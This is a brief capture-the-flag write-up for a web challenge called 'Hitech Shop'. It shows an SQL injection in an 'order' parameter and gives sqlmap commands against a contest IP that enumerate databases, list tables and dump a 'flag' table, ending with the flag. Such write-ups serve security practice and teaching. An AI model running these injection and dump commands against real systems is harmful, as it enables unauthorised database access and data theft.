- Category: Web
- Name: Hitech Shop
- Level: None
- Description: None
- Overview the challenge provided us a search box i think it
Sql Injection
- I try
double quote
and this is server response - Run this command in sqlmap
sqlmap -u http://125.235.240.166:20105/index?order=price --time-sec=200 --user-agent=* --dbs --level 5
- I found two databases, but i only attention
vannd
- Then i used command
sqlmap -u http://125.235.240.166:20105/index?order=price --tables -D vannd
for scanvannd
table - Finally i found a table contain flag =))))
- Later i scan
flag
table used this commandsqlmap -u http://125.235.240.166:20105/index?order=price --columns -D vannd -T flag --dump
- FLAG
ASCIS{SQL_1nJecTi0n_Ba5e_0N_OrdeR_bY}